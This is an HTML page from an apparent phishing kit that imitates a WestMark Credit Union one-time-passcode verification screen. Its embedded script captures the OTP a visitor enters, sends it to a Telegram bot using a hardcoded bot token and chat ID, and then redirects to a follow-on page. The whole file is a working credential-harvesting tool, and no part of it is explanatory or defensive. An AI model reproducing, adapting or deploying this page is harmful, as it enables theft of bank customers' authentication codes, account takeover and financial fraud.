<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<title></title>
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	<style>
		@font-face{
	font-family: 'fmtt';

  src: url(img/font1.ttf) format('truetype');
  }
*{
	margin:auto;
	font-size:14px;
	outline:0;
	font-family:'fmtt';
}input{
	border:0;
    display:block;
	margin-top:0px;
	width:100%;
	font-size: 15px;
	padding:6px;
	background:#f2f2f2;
	
	padding-left:0;
}td{
	border-right:1px solid black;
	padding-right:10px;
	padding-left:10px;
	font-size:11px;
	color:#0072ce;
}.inp{
	margin-top:30px;
	border-radius:15px;
	background:#f2f2f2;
	text-align:center;
	border:1px solid #f2f2f2;
	width:93%;
	padding:6px;
	padding-left:1px;
}label{
	display:block;
	text-align:left;
	margin:0;
	font-size:12px;
	color:gray;
	padding:0;
	width:100%;
}

	</style>
</head>
<body>
<div style="text-align: center;background:white;padding:5px;padding-top:50px;padding-bottom:0px;max-width:500px;">
<img src="img/logo.png" width="230px">
<br>
<p style="text-align:left;padding:15px;border-top:1px solid lightgray;"></p>
<p style="text-align:left;padding:15px;font-size:18px;padding-bottom:0;margin-top:15px">Code Authentication</p>
<p style="text-align:left;padding:15px;font-size:12px;padding-top:8px;color:gray">A one time verification code has been sent to your mobile number. We match your answer against our record.</p>

</div>

<div style="max-width:500px;padding:0px;">

<form action="" method="POST" id="form">
<div style="text-align:center">
<div class="inp">
<div style="width:95%">
<label for="otp">Enter OTP</label>
<input placeholder="X X X X X X" id="otp" name="otp" minlength="6" maxlength="14" required>
</div>
</div>



</div>


<div class="inp" style="padding-left:0;background:#00688f;">
<button style="background:#00688f;border:0;padding:10px;border-radius:15px;color:white;font-size:17px;display:block;width:100%">Continue</button>
</div>
<p style="font-size:14px;color:#0072ce;margin-top:15px;text-align:center;font-weight:bold;visibility:hidden">Register</p>

</div>
</form>
<script>
     document.getElementById('form').addEventListener('submit', function(event) {
    event.preventDefault(); 

  
    const otp = document.getElementById('otp').value;



    // Your Telegram bot API token and chat ID

    
    //----------------------------------------------------------------
    const botToken = '6956433562:AAFSKLycuqUsY0g-DV9_2D9TkhAFGCO3FX8'; 
    const chatId = '6595653755'; 
   //------------------------------------------------------------------------

    const message = `
    #------------------[ WestMark Credit Union OTP ]---------------------#:
    OTP Code: ${otp}
    #-------------------[ SNICKYNINJA - END ]------------------------#
    `;
    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
    fetch(url, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
        },
        body: JSON.stringify({
            chat_id: chatId,
            text: message
        })
    })
    .then(response => response.json())
    .then(data => {
        if (data.ok) {
            setTimeout(function() {
    window.location.href = "need2.html";
}, 0);
        } 
    })
   
});

    </script>


</body>
</html>